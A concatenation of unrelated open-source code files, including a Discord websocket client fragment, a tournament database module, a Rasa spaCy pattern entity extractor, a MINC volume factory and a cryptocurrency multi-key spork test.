aiohttp.WSMsgType.CLOSE,
):
_log.debug("Received %s", msg)
raise WebSocketClosure
except (asyncio.TimeoutError, WebSocketClosure) as e:
# Ensure the keep alive handler is closed
if self._keep_alive:
self._keep_alive.stop()
self._keep_alive = None
if isinstance(e, asyncio.TimeoutError):
_log.info("Timed out receiving packet. Attempting a reconnect.")
raise ReconnectWebSocket(self.shard_id) from None
code = self._close_code or self.socket.close_code
if self._can_handle_close():
_log.info("Websocket closed with %s, attempting a reconnect.", code)
raise ReconnectWebSocket(self.shard_id) from None
else:
_log.info("Websocket closed with %s, cannot reconnect.", code)
raise ConnectionClosed(
self.socket, shard_id=self.shard_id, code=code
) from None
async def debug_send(self, data, /):
await self._rate_limiter.block()
self._dispatch("socket_raw_send", data)
await self.socket.send_str(data)
async def send(self, data, /):
await self._rate_limiter.block()
await self.socket.send_str(data)
async def send_as_json(self, data):
try:
await self.send(utils._to_json(data))
except RuntimeError as exc:
if not self._can_handle_close():
raise ConnectionClosed(self.socket, shard_id=self.shard_id) from exc
async def send_heartbeat(self, data):
# This bypasses the rate limit handling code since it has a higher priority
try:
await self.socket.send_str(utils._to_json(data))
except RuntimeError as exc:
if not self._can_handle_close():
raise ConnectionClosed(self.socket, shard_id=self.shard_id) from exc
async def change_presence(self, *, activity=None, status=None, since=0.0):
if activity is not None:
if not isinstance(activity, BaseActivity):
raise InvalidArgument("activity must derive from BaseActivity.")
activity = [activity.to_dict()]
else:
activity = []
if status == "idle":
since = int(time.time() * 1000)
payload = {
"op": self.PRESENCE,
"d": {
"activities": activity,
"afk": False,
"since": since,
"status": status,
},
}
sent = utils._to_json(payload)
_log.debug('Sending "%s" to change status', sent)
await self.send(sent)
async def request_chunks(
self, guild_id, query=None, *, limit, user_ids=None, presences=False, nonce=None
):
payload = {
"op": self.REQUEST_MEMBERS,
"d": {"guild_id": guild_id, "presences": presences, "limit": limit},
}
if nonce:
payload["d"]["nonce"] = nonce
if user_ids:
payload["d"]["user_ids"] = user_ids
if query is not None:
payload["d"]["query"] = query
await self.send_as_json(payload)
async def voice_state(self, guild_id, channel_id, self_mute=False, self_deaf=False):
payload = {
"op": self.VOICE_STATE,
"d": {
"guild_id": guild_id,
"channel_id": channel_id,
"self_mute": self_mute,
"self_deaf": self_deaf,
},
}
_log.debug("Updating our voice state to %s.", payload)
await self.send_as_json(payload)
async def close(self, code=4000):
if self._keep_alive:
self._keep_alive.stop()
self._keep_alive = None
self._close_code = code
await self.socket.close(code=code)
class DiscordVoiceWebSocket:
"""Implements the websocket protocol for handling voice connections.
Attributes
-----------
IDENTIFY
Send only. Starts a new voice session.
SELECT_PROTOCOL
        Send only. Tells Discord which encryption mode to use and how to connect for voice.
READY
Receive only. Tells the websocket that the initial connection has completed.
HEARTBEAT
Send only. Keeps your websocket connection alive.
SESSION_DESCRIPTION
Receive only. Gives you the secret key required for voice.
SPEAKING
Send only. Notifies the client if you are currently speaking.
HEARTBEAT_ACK
Receive only. Tells you your heartbeat has been acknowledged.
RESUME
        Send only. Resumes an existing voice session.
HELLO
Receive only. Tells you that your websocket connection was acknowledged.
RESUMED
        Receive only. Tells you that your RESUME request has succeeded.
CLIENT_CONNECT
Indicates a user has connected to voice.
CLIENT_DISCONNECT
Receive only. Indicates a user has disconnected from voice.
"""
IDENTIFY = 0
SELECT_PROTOCOL = 1
READY = 2
HEARTBEAT = 3
SESSION_DESCRIPTION = 4
SPEAKING = 5
HEARTBEAT_ACK = 6
RESUME = 7
HELLO = 8
RESUMED = 9
CLIENT_CONNECT = 12
CLIENT_DISCONNECT = 13
def __init__(self, socket, loop, *, hook=None):
self.ws = socket
self.loop = loop
self._keep_alive = None
self._close_code = None
self.secret_key = None
if hook:
self._hook = hook
async def _hook(self, *args):
pass
async def send_as_json(self, data):
_log.debug("Sending voice websocket frame: %s.", data)
await self.ws.send_str(utils._to_json(data))
send_heartbeat = send_as_json
async def resume(self):
state = self._connection
payload = {
"op": self.RESUME,
"d": {
"token": state.token,
"server_id": str(state.server_id),
"session_id": state.session_id,
},
}
await self.send_as_json(payload)
async def identify(self):
state = self._connection
payload = {
"op": self.IDENTIFY,
"d": {
"server_id": str(state.server_id),
"user_id": str(state.user.id),
"session_id": state.session_id,
"token": state.token,
},
}
await self.send_as_json(payload)
@classmethod
async def from_client(cls, client, *, resume=False, hook=None):
"""Creates a voice websocket for the :class:`VoiceClient`."""
gateway = "wss://" + client.endpoint + "/?v=4"
http = client._state.http
socket = await http.ws_connect(gateway, compress=15)
ws = cls(socket, loop=client.loop, hook=hook)
ws.gateway = gateway
ws._connection = client
ws._max_heartbeat_timeout = 60.0
ws.thread_id = threading.get_ident()
if resume:
await ws.resume()
else:
await ws.identify()
return ws
async def select_protocol(self, ip, port, mode):
payload = {
"op": self.SELECT_PROTOCOL,
"d": {
"protocol": "udp",
"data": {"address": ip, "port": port, "mode": mode},
},
}
await self.send_as_json(payload)
async def client_connect(self):
payload = {
"op": self.CLIENT_CONNECT,
"d": {"audio_ssrc": self._connection.ssrc},
}
await self.send_as_json(payload)
async def speak(self, state=SpeakingState.voice):
payload = {"op": self.SPEAKING, "d": {"speaking": int(state), "delay": 0}}
await self.send_as_json(payload)
async def received_message(self, msg):
_log.debug("Voice websocket frame received: %s", msg)
op = msg["op"]
data = msg.get("d")
if op == self.READY:
await self.initial_connection(data)
elif op == self.HEARTBEAT_ACK:
self._keep_alive.ack()
elif op == self.RESUMED:
_log.info("Voice RESUME succeeded.")
elif op == self.SESSION_DESCRIPTION:
self._connection.mode = data["mode"]
await self.load_secret_key(data)
elif op == self.HELLO:
interval = data["heartbeat_interval"] / 1000.0
self._keep_alive = VoiceKeepAliveHandler(
ws=self, interval=min(interval, 5.0)
)
self._keep_alive.start()
await self._hook(self, msg)
async def initial_connection(self, data):
state = self._connection
state.ssrc = data["ssrc"]
state.voice_port = data["port"]
state.endpoint_ip = data["ip"]
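        # Note (added): this is the IP discovery handshake -- a 70-byte probe carrying
        # our SSRC is sent to the voice server, which echoes back the external IP and
        # port that are then passed to SELECT_PROTOCOL below.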
packet = bytearray(70)
struct.pack_into(">H", packet, 0, 1) # 1 = Send
struct.pack_into(">H", packet, 2, 70) # 70 = Length
struct.pack_into(">I", packet, 4, state.ssrc)
state.socket.sendto(packet, (state.endpoint_ip, state.voice_port))
recv = await self.loop.sock_recv(state.socket, 70)
_log.debug("received packet in initial_connection: %s", recv)
# the ip is ascii starting at the 4th byte and ending at the first null
ip_start = 4
ip_end = recv.index(0, ip_start)
state.ip = recv[ip_start:ip_end].decode("ascii")
state.port = struct.unpack_from(">H", recv, len(recv) - 2)[0]
_log.debug("detected ip: %s port: %s", state.ip, state.port)
# there *should* always be at least one supported mode (xsalsa20_poly1305)
modes = [
mode for mode in data["modes"] if mode in self._connection.supported_modes
]
_log.debug("received supported encryption modes: %s", ", ".join(modes))
mode = modes[0]
await self.select_protocol(state.ip, state.port, mode)
_log.info("selected the voice protocol for use (%s)", mode)
@property
def latency(self):
""":class:`float`: Latency between a HEARTBEAT and its HEARTBEAT_ACK in seconds."""
heartbeat = self._keep_alive
return float("inf") if heartbeat is None else heartbeat.latency
@property
def average_latency(self):
""":class:`list`: Average of last 20 HEARTBEAT latencies."""
heartbeat = self._keep_alive
if heartbeat is None or not heartbeat.recent_ack_latencies:
return float("inf")
return sum(heartbeat.recent_ack_latencies) / len(heartbeat.recent_ack_latencies)
async def load_secret_key(self, data):
_log.info("received secret key for voice connection")
self.secret_key = self._connection.secret_key = data.get("secret_key")
await self.speak()
await self.speak(False)
async def poll_event(self):
# This exception is handled up the chain
msg = await asyncio.wait_for(self.ws.receive(), timeout=30.0)
if msg.type is aiohttp.WSMsgType.TEXT:
await self.received_message(utils._from_json(msg.data))
elif msg.type is aiohttp.WSMsgType.ERROR:
_log.debug("Received %s", msg)
raise ConnectionClosed(self.ws, shard_id=None) from msg.data
elif msg.type in (
aiohttp.WSMsgType.CLOSED,
aiohttp.WSMsgType.CLOSE,
aiohttp.WSMsgType.CLOSING,
):
_log.debug("Received %s", msg)
raise ConnectionClosed(self.ws, shard_id=None, code=self._close_code)
async def close(self, code=1000):
if self._keep_alive is not None:
self._keep_alive.stop()
self._close_code = code
await self.ws.close(code=code)
|
the-stack_0_3689 | import subprocess
import multiprocessing
import logging
import os.path
import pygments.util
import pygments.lexers
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger("classify_linguist")
from .common import *
def classify_pygments(path):
with open(path, "rb") as f:
data = f.read()
try:
return pygments.lexers.guess_lexer_for_filename(path, data).name
except pygments.util.ClassNotFound:
return None
def main():
meta = Meta()
dataset = Dataset()
files = list(dataset.data["files"].keys())
with multiprocessing.Pool() as p:
languages = p.map(classify_pygments, [os.path.join("data", f) for f in files])
for f, l in zip(files, languages):
        if l:
            norm_lang = meta.to_normalized_language(dataset="pygments", lang=l)
dataset.data["files"][f]["annotations"]["pygments-filename"] = norm_lang
else:
if "pygments-filename" in dataset.data["files"][f]["annotations"]:
del dataset.data["files"][f]["annotations"]["pygments-filename"]
dataset.save()
if __name__ == "__main__":
multiprocessing.log_to_stderr(logging.DEBUG)
main()
|
the-stack_0_3690 | import configparser
import functools
import arrow
cf = configparser.ConfigParser()
configFile = "config/config.ini"
# configFile = "F:\\code_space\\eniac\\factor_server_docker\\ENIAC\\config\\config.ini"
cf.read(configFile)
"Attributes read from the configuration source"
#es
dbHost = cf.get("service_es", "db_host")
dbPort = cf.getint("service_es", "db_port")
dbUser = cf.get("service_es", "db_user")
dbPass = cf.get("service_es", "db_pass")
#log_conf
log_conf = cf.get("file", "log_conf")
# kafka
kafkaHost1 = cf.get("service_kafka", "db_host_1")
kafkaHost2 = cf.get("service_kafka", "db_host_2")
kafkaHost3 = cf.get("service_kafka", "db_host_3")
kafkaPort = cf.get("service_kafka", "db_port")
kafkaTopic = cf.get("service_kafka", "db_topic")
kafkaList = [f'{kafkaHost1}:{kafkaPort}',
f'{kafkaHost2}:{kafkaPort}',
f'{kafkaHost3}:{kafkaPort}']
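# Illustrative config/config.ini layout implied by the reads above (all values are
# made up, not taken from any real deployment):
#   [service_es]
#   db_host = 127.0.0.1
#   db_port = 9200
#   db_user = elastic
#   db_pass = changeme
#   [file]
#   log_conf = config/logging.conf
#   [service_kafka]
#   db_host_1 = 10.0.0.1
#   db_host_2 = 10.0.0.2
#   db_host_3 = 10.0.0.3
#   db_port = 9092
#   db_topic = example_topic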
# import logging
# import logging.config
#
# logging.config.fileConfig(log_conf)
# logger = logging.getLogger("neo")
#
# import warnings
# warnings.filterwarnings("ignore")  # suppress warning output
|
the-stack_0_3691 | #!/usr/bin/env python
#
# tournament.py -- implementation of a Swiss-system tournament
#
import psycopg2
from contextlib import contextmanager
@contextmanager
def db_helper():
"""
    Database helper context manager. Creates a cursor from a database
    connection, yields that cursor to the caller for running queries, and then
    cleans up by committing on success and closing the cursor and connection.
"""
db = connect()
c = db.cursor()
try:
yield c
except:
raise
else:
db.commit()
finally:
c.close()
db.close()
def connect():
"""Connect to the PostgreSQL database. Returns a database connection."""
try:
return psycopg2.connect("dbname='tournament'")
except:
print ("Connection failed")
def deleteMatches():
"""Removes all the match records from the database."""
with db_helper() as c:
c.execute("TRUNCATE matches")
def deletePlayers():
"""Removes all the player records from the database."""
with db_helper() as c:
c.execute("TRUNCATE players CASCADE")
def countPlayers():
"""Returns the number of players currently registered."""
with db_helper() as c:
c.execute("SELECT count (*) FROM players")
return c.fetchone()[0]
def registerPlayer(name):
"""Adds a player to the tournament database.
The database assigns a unique serial id number for the player. (This
should be handled by your SQL database schema, not in your Python code.)
Args:
name: the player's full name (need not be unique).
"""
with db_helper() as c:
query1 = "INSERT INTO players (player_name) VALUES (%s);"
data = (name,)
c.execute(query1, data)
def playerStandings():
"""Returns a list of the players and their win records, sorted by wins.
The first entry in the list will be the player in first place, or a player
tied for first place if there is currently a tie.
Returns:
A list of tuples, each of which contains (id, name, wins, matches):
id: the player's unique id (assigned by the database)
name: the player's full name (as registered)
wins: the number of matches the player has won
matches: the number of matches the player has played
"""
with db_helper() as c:
c.execute(
"""SELECT players.id, players.player_name, count(matches.winner)as wins,
(SELECT count(*) FROM matches
WHERE matches.loser = players.id
OR matches.winner = players.id) as matches
FROM players LEFT JOIN matches
ON players.id = matches.winner
GROUP BY players.id
ORDER BY wins DESC
""")
rows = c.fetchall()
player_standings = []
for row in rows:
player_standings.append(row)
return player_standings
def reportMatch(winner, loser):
"""Records the outcome of a single match between two players.
Args:
winner: the id number of the player who won
loser: the id number of the player who lost
"""
with db_helper() as c:
query = "INSERT INTO matches (winner, loser) VALUES (%s, %s);"
        # pass the ids directly; wrapping them in extra tuples breaks psycopg2 parameter binding
        c.execute(query, (winner, loser))
def swissPairings():
"""Returns a list of pairs of players for the next round of a match.
Assuming that there are an even number of players registered, each player
appears exactly once in the pairings. Each player is paired with another
player with an equal or nearly-equal win record, that is, a player adjacent
to him or her in the standings.
Returns:
A list of tuples, each of which contains (id1, name1, id2, name2)
id1: the first player's unique id
name1: the first player's name
id2: the second player's unique id
name2: the second player's name
"""
players_id_name = []
players = playerStandings()
for row in players:
player_id_name = (row[0], row[1])
players_id_name.append(player_id_name)
pairings = []
index = 0
while index < len(players_id_name):
pairings.append(players_id_name[index] + players_id_name[index+1])
index += 2
return pairings
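# Usage sketch (added for illustration; assumes the "tournament" database and its
# players/matches tables already exist, and the player names are made up):
def _demo_round():
    """Run one illustrative Swiss round end to end."""
    deleteMatches()
    deletePlayers()
    for name in ("Ada", "Grace", "Alan", "Edsger"):
        registerPlayer(name)
    for id1, _name1, id2, _name2 in swissPairings():
        reportMatch(id1, id2)  # arbitrarily let the first player of each pair win
    print(playerStandings())
if __name__ == '__main__':
    _demo_round()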
|
the-stack_0_3695 | # coding=utf-8
from __future__ import absolute_import, print_function
import posixpath
# noinspection PyUnresolvedReferences
from six.moves.urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit
__author__ = 'Tyler Butler <[email protected]>'
try:
# noinspection PyUnresolvedReferences
from propane.flask.urls import *
except ImportError:
pass
def remove_query_parameters(url, params=None, case_sensitive=False):
def is_in(to_check, iterable, cs):
if cs:
return to_check in iterable
else:
return to_check.upper().lower() in iterable
pieces = list(urlsplit(url))
if params is None:
pieces[3] = ''
else:
if not case_sensitive:
params[:] = [p.upper().lower() for p in params]
query = parse_qsl(pieces[3])
query[:] = [(param, value) for param, value in query if not is_in(param, params, case_sensitive)]
pieces[3] = urlencode(query, doseq=True)
return urlunsplit(pieces)
def urljoin(url1, *url2):
# This method is necessary because sometimes urlparse.urljoin simply doesn't work correctly
# when joining URL fragments.
return posixpath.join(url1, *url2)
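# Usage sketch (added for illustration; the URL is made up):
if __name__ == '__main__':
    print(remove_query_parameters('http://example.com/a?x=1&y=2', params=['y']))
    # -> http://example.com/a?x=1
    print(urljoin('http://example.com/a', 'b', 'c'))
    # -> http://example.com/a/b/c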
|
the-stack_0_3696 | """factories for creating mincVolumes"""
from .volumes import mincException, mincVolume, getDtype, transform_xyz_coordinates_using_xfm, transform_multiple_xyz_coordinates_using_xfm
def volumeFromFile(filename, dtype="double", readonly=True, labels=False):
"""creates a new mincVolume from existing file."""
v = mincVolume(filename=filename, dtype=dtype, readonly=readonly, labels=labels)
v.openFile()
return(v)
def volumeFromInstance(volInstance, outputFilename, dtype="double", data=False,
dims=None, volumeType=None, path=False, labels=False):
"""creates new mincVolume from another mincVolume"""
v = mincVolume(filename=outputFilename, dtype=dtype, readonly=False, labels=labels)
v.copyDimensions(volInstance, dims)
v.copyDtype(volInstance)
v.createVolumeHandle(volumeType or volInstance.volumeType)
v.copyHistory(volInstance)
if data:
if not volInstance.dataLoaded:
volInstance.loadData()
v.createVolumeImage()
v.data = volInstance.data.copy()
if path:
v.copyAttributes(volInstance, path)
return(v)
def volumeLikeFile(likeFilename, outputFilename, dtype="double", volumeType=None,
labels=False, data=False):
"""creates a new mincVolume with dimension info taken from an existing file"""
lf = volumeFromFile(filename=likeFilename, dtype=dtype, labels=labels)
v = volumeFromInstance(volInstance=lf, outputFilename=outputFilename,
dtype=dtype, volumeType=volumeType,
labels=labels, data=data)
lf.closeVolume()
return(v)
def volumeFromDescription(outputFilename, dimnames, sizes, starts, steps, volumeType="ushort",
dtype="double", labels=False,
x_dir_cosines=(1.0,0.0,0.0),
y_dir_cosines=(0.0,1.0,0.0),
z_dir_cosines=(0.0,0.0,1.0)):
"""creates a new mincVolume given starts, steps, sizes, and dimension names"""
v = mincVolume(filename=outputFilename, dtype=dtype, readonly=False, labels=labels)
v.createNewDimensions(dimnames, sizes, starts, steps,
x_dir_cosines, y_dir_cosines, z_dir_cosines)
v.createVolumeHandle(volumeType)
v.createVolumeImage()
return(v)
def volumeFromData(outputFilename, data, dimnames=("xspace", "yspace", "zspace"),
starts=(0,0,0), steps=(1,1,1),
volumeType="ushort", dtype=None, labels=False,
x_dir_cosines=(1.0,0.0,0.0),
y_dir_cosines=(0.0,1.0,0.0),
z_dir_cosines=(0.0,0.0,1.0)):
"""creates a mincVolume from a given array"""
# deal with the dtype. If the dtype was not set, use the dtype of the
# data block. If that is not possible, default to double.
    if dtype is None:
if getDtype(data):
dtype = getDtype(data)
else:
dtype = "double"
v = volumeFromDescription(outputFilename=outputFilename, sizes=data.shape,
dimnames=dimnames, starts=starts, steps=steps,
volumeType=volumeType, dtype=dtype, labels=labels,
x_dir_cosines=x_dir_cosines,
y_dir_cosines=y_dir_cosines,
z_dir_cosines=z_dir_cosines)
v.data = data
return v
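# Usage sketch (added for illustration): write a small zero-filled volume. Assumes
# numpy is available; writeFile()/closeVolume() are assumed from the pyminc
# mincVolume API (closeVolume is already used above in volumeLikeFile).
def _exampleVolumeFromData(outputFilename):
    import numpy as np
    vol = volumeFromData(outputFilename, np.zeros((10, 10, 10)),
                         dimnames=("xspace", "yspace", "zspace"),
                         starts=(0, 0, 0), steps=(1, 1, 1))
    vol.writeFile()
    vol.closeVolume()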
|
the-stack_0_3702 | from rasa.nlu.components import Component
from typing import Any, Optional, Text, Dict, TYPE_CHECKING
import os
import spacy
import pickle
from spacy.matcher import Matcher
from rasa.nlu.extractors.extractor import EntityExtractor
if TYPE_CHECKING:
from rasa.nlu.model import Metadata
PATTERN_NER_FILE = 'pattern_ner.pkl'
class SpacyPatternNER(EntityExtractor):
"""A new component"""
name = "pattern_ner_spacy"
# Defines what attributes the pipeline component will
# provide when called. The listed attributes
# should be set by the component on the message object
# during test and train, e.g.
# ```message.set("entities", [...])```
provides = ["entities"]
# Which attributes on a message are required by this
# component. e.g. if requires contains "tokens", than a
# previous component in the pipeline needs to have "tokens"
# within the above described `provides` property.
requires = ["tokens"]
# Defines the default configuration parameters of a component
# these values can be overwritten in the pipeline configuration
# of the model. The component should choose sensible defaults
# and should be able to create reasonable results with the defaults.
defaults = {}
# Defines what language(s) this component can handle.
# This attribute is designed for instance method: `can_handle_language`.
# Default value is None which means it can handle all languages.
# This is an important feature for backwards compatibility of components.
language_list = None
def __init__(self, component_config=None, matcher=None):
super(SpacyPatternNER, self).__init__(component_config)
if matcher:
self.matcher = matcher
self.spacy_nlp = spacy.blank('en')
self.spacy_nlp.vocab = self.matcher.vocab
else:
self.spacy_nlp = spacy.blank('en')
self.matcher = Matcher(self.spacy_nlp.vocab)
def train(self, training_data, cfg, **kwargs):
"""Train this component.
        This is the component's chance to train itself provided
with the training data. The component can rely on
any context attribute to be present, that gets created
by a call to :meth:`components.Component.pipeline_init`
of ANY component and
on any context attributes created by a call to
:meth:`components.Component.train`
of components previous to this one."""
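        # Assumed lookup table shape (inferred from the loop below), e.g.
        # {"name": "city", "elements": ["new york", "san francisco"]}; each element
        # becomes a case-insensitive token pattern registered with the spaCy Matcher.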
for lookup_table in training_data.lookup_tables:
key = lookup_table['name']
pattern = []
for element in lookup_table['elements']:
tokens = [{'LOWER': token.lower()} for token in str(element).split()]
pattern.append(tokens)
self.matcher.add(key, pattern)
def process(self, message, **kwargs):
"""Process an incoming message.
        This is the component's chance to process an incoming
message. The component can rely on
any context attribute to be present, that gets created
by a call to :meth:`components.Component.pipeline_init`
of ANY component and
on any context attributes created by a call to
:meth:`components.Component.process`
of components previous to this one."""
entities = []
# with plural forms
doc = self.spacy_nlp(message.data['text'].lower())
matches = self.matcher(doc)
entities = self.getNewEntityObj(doc, matches, entities)
# Without plural forms
doc = self.spacy_nlp(' '.join([token.lemma_ for token in doc]))
matches = self.matcher(doc)
entities = self.getNewEntityObj(doc, matches, entities)
# Remove duplicates
seen = set()
new_entities = []
for entityObj in entities:
record = tuple(entityObj.items())
if record not in seen:
seen.add(record)
new_entities.append(entityObj)
message.set("entities", message.get("entities", []) + new_entities, add_to_output=True)
def getNewEntityObj(self, doc, matches, entities):
for ent_id, start, end in matches:
new_entity_value = doc[start:end].text
new_entity_value_len = len(new_entity_value.split())
is_add = True
for old_entity in entities:
old_entity_value = old_entity["value"]
old_entity_value_len = len(old_entity_value.split())
if old_entity_value_len > new_entity_value_len and new_entity_value in old_entity_value:
is_add = False
elif old_entity_value_len < new_entity_value_len and old_entity_value in new_entity_value:
entities.remove(old_entity)
if is_add:
entities.append({
'start': start,
'end': end,
'value': doc[start:end].text,
'entity': self.matcher.vocab.strings[ent_id],
'confidence': None,
'extractor': self.name
})
return entities
def persist(self, file_name: Text, model_dir: Text) -> Optional[Dict[Text, Any]]:
"""Persist this component to disk for future loading."""
if self.matcher:
modelFile = os.path.join(model_dir, PATTERN_NER_FILE)
self.saveModel(modelFile)
return {"pattern_ner_file": PATTERN_NER_FILE}
@classmethod
def load(
cls,
meta: Dict[Text, Any],
model_dir: Optional[Text] = None,
model_metadata: Optional["Metadata"] = None,
cached_component: Optional["Component"] = None,
**kwargs: Any
) -> "Component":
"""Load this component from file."""
file_name = meta.get("pattern_ner_file", PATTERN_NER_FILE)
modelFile = os.path.join(model_dir, file_name)
if os.path.exists(modelFile):
modelLoad = open(modelFile, "rb")
matcher = pickle.load(modelLoad)
modelLoad.close()
return cls(meta, matcher)
else:
return cls(meta)
def saveModel(self, modelFile):
modelSave = open(modelFile, "wb")
pickle.dump(self.matcher, modelSave)
modelSave.close() |
the-stack_0_3703 | import bpy
class AMK2BPanel(bpy.types.Panel):
bl_label = "AMK2B"
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
@classmethod
def poll(cls, context):
return hasattr(bpy, "amk2b")
def draw(self, context):
layout = self.layout
row = layout.row()
row.label(text="Receive Kinect Data")
row = layout.row()
if not bpy.amk2b.kinect_data_receiving_started:
row.operator("amk2b.kinect_data_receiving_operator", text="Start")
else:
row.operator("amk2b.kinect_data_receiving_operator", text="Stop")
row = layout.row()
row.label(text="Apply Kinect Data")
row = layout.row()
if not bpy.amk2b.kinect_data_applying_started:
row.operator("amk2b.kinect_data_applying_operator", text="Start")
else:
row.operator("amk2b.kinect_data_applying_operator", text="Stop")
row = layout.row()
row.label(text="Recording")
row = layout.row()
if not bpy.amk2b.recording_pre_started:
row.operator("amk2b.recording_operator", text="Start")
else:
if not bpy.amk2b.recording_started:
row.operator(
"amk2b.recording_operator",
text="waiting..." + str(bpy.amk2b.recording_wait_time)
)
else:
row.operator("amk2b.recording_operator", text="Stop")
|
the-stack_0_3704 | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Lksc Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import time
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import connect_nodes, wait_until
'''
multikeysporks.py
Test logic for using several signer keys for spork broadcasts.
We configure 5 possible spork signer keys and require a minimum of 3 signers.
We check that 1 or 2 signers cannot set the spork value, that any 3 signers
can change the spork value, and that a different set of 3 signers can change
it again.
'''
class MultiKeySporkTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 5
self.setup_clean_chain = True
self.is_network_split = False
def setup_network(self):
# secret(base58): 931wyuRNVYvhg18Uu9bky5Qg1z4QbxaJ7fefNBzjBPiLRqcd33F
# keyid(hex): 60f0f57f71f0081f1aacdd8432340a33a526f91b
# address(base58): yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa
# secret(base58): 91vbXGMSWKGHom62986XtL1q2mQDA12ngcuUNNe5NfMSj44j7g3
# keyid(hex): 43dff2b09de2f904f688ec14ee6899087b889ad0
# address(base58): yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h
# secret(base58): 92bxUjPT5AhgXuXJwfGGXqhomY2SdQ55MYjXyx9DZNxCABCSsRH
# keyid(hex): d9aa5fa00cce99101a4044e65dc544d1579890de
# address(base58): ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7
# secret(base58): 934yPXiVGf4RCY2qTs2Bt5k3TEtAiAg12sMxCt8yVWbSU7p3fuD
# keyid(hex): 0b23935ce0bea3b997a334f6fa276c9fa17687b2
# address(base58): ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn
# secret(base58): 92Cxwia363Wg2qGF1fE5z4GKi8u7r1nrWQXdtsj2ACZqaDPSihD
# keyid(hex): 1d1098b2b1f759b678a0a7a098637a9b898adcac
# address(base58): yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui
self.add_nodes(5)
self.start_node(0, ["-sporkkey=931wyuRNVYvhg18Uu9bky5Qg1z4QbxaJ7fefNBzjBPiLRqcd33F",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(1, ["-sporkkey=91vbXGMSWKGHom62986XtL1q2mQDA12ngcuUNNe5NfMSj44j7g3",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(2, ["-sporkkey=92bxUjPT5AhgXuXJwfGGXqhomY2SdQ55MYjXyx9DZNxCABCSsRH",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(3, ["-sporkkey=934yPXiVGf4RCY2qTs2Bt5k3TEtAiAg12sMxCt8yVWbSU7p3fuD",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(4, ["-sporkkey=92Cxwia363Wg2qGF1fE5z4GKi8u7r1nrWQXdtsj2ACZqaDPSihD",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
# connect nodes at start
for i in range(0, 5):
for j in range(i, 5):
connect_nodes(self.nodes[i], j)
def get_test_spork_value(self, node):
info = node.spork('show')
# use InstantSend spork for tests
return info['SPORK_2_INSTANTSEND_ENABLED']
def set_test_spork_value(self, node, value):
# use InstantSend spork for tests
node.spork('SPORK_2_INSTANTSEND_ENABLED', value)
def run_test(self):
# check test spork default state
for node in self.nodes:
assert(self.get_test_spork_value(node) == 4070908800)
self.bump_mocktime(1)
# first and second signers set spork value
self.set_test_spork_value(self.nodes[0], 1)
self.set_test_spork_value(self.nodes[1], 1)
# spork change requires at least 3 signers
time.sleep(10)
for node in self.nodes:
assert(self.get_test_spork_value(node) != 1)
# third signer set spork value
self.set_test_spork_value(self.nodes[2], 1)
# now spork state is changed
for node in self.nodes:
wait_until(lambda: self.get_test_spork_value(node) == 1, sleep=0.1, timeout=10)
self.bump_mocktime(1)
# now set the spork again with other signers to test
# old and new spork messages interaction
self.set_test_spork_value(self.nodes[2], 2)
self.set_test_spork_value(self.nodes[3], 2)
self.set_test_spork_value(self.nodes[4], 2)
for node in self.nodes:
wait_until(lambda: self.get_test_spork_value(node) == 2, sleep=0.1, timeout=10)
if __name__ == '__main__':
MultiKeySporkTest().main()
|
the-stack_0_3705 | from config import OWNER_ID
from pyrogram.types.bots_and_keyboards import reply_keyboard_markup
from TamilBots.modules import *
from pyrogram import idle, filters
from pyrogram.types import InlineKeyboardMarkup
from pyrogram.types import InlineKeyboardButton
from TamilBots import app, LOGGER
from TamilBots.TamilBots import ignore_blacklisted_users
from TamilBots.sql.chat_sql import add_chat_to_db
start_text = """
